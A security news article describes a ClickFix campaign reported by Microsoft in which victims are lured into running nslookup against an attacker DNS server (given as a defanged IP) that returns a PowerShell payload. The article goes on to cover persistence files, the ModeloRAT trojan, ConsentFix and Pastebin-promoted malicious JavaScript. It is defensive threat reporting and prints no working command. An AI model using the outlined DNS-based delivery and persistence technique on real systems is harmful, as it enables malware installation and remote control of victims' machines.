ClickFix Exploit Uses Nslookup to Deliver PowerShell Payload via DNS
Threat actors are increasingly utilizing DNS queries in ClickFix attacks to deliver malware. This represents a novel method in social engineering campaigns aimed at deceiving users into executing harmful commands.
Understanding ClickFix Exploit and Its Impact
ClickFix attacks typically lure users into running commands that appear to fix errors, install updates, or enhance functionality. The latest iteration of these attacks employs a technique where an attacker-controlled DNS server sends a second-stage payload through DNS lookups.
Mechanism of the Attack
In a recent ClickFix campaign reported by Microsoft, unsuspecting victims are directed to use the nslookup command to query a malicious DNS server rather than their system’s default server. This command triggers a DNS lookup for a specific hostname that subsequently returns a malicious PowerShell script.
- Command used: nslookup
- Attacker-controlled DNS server: 84[.]21.189[.]20
- Payload delivery mechanism: DNS response containing PowerShell script
This PowerShell script executes on the victim’s device, leading to malware installation. Reports indicate that the second-stage script downloads further malicious tools, including a ZIP archive containing Python runtime executables designed for reconnaissance on infected devices.
Establishing Persistence
To maintain access, the attack creates entries in the user’s system, such as:
- %APPDATA%WPy64-31401pythonscript.vbs
- %STARTUP%MonitoringService.lnk
These entries enable the malware to execute on system startup, with the final payload identified as ModeloRAT, a remote access trojan granting attackers control over compromised systems.
Evolution of ClickFix Attacks
Over the past year, ClickFix attacks have shown significant evolution. Threat actors have adapted their delivery tactics and payload types to target various operating systems. Early ClickFix campaigns often required users to execute commands directly on their systems. However, recent tactics have expanded to include more sophisticated methods.
New Techniques and Challenges
One notable recent campaign, dubbed “ConsentFix,” exploited the Azure CLI OAuth app to compromise Microsoft accounts without requiring passwords, successfully bypassing multi-factor authentication (MFA). Additionally, threat actors are leveraging popular AI platforms to distribute misleading guides related to ClickFix attacks.
New reports also highlight an innovative approach where attackers promoted a ClickFix exploit through Pastebin comments. This tactic tricked cryptocurrency users into executing malicious JavaScript in their browsers, affecting transaction operations at cryptocurrency exchanges.
This represents a significant shift, as it illustrates the ability of attackers to execute JavaScript directly in browsers, focusing on web application functionality rather than purely deploying malware.
As cyber threats continue to evolve, vigilance and updated security practices are essential for users and organizations to navigate these challenges effectively.
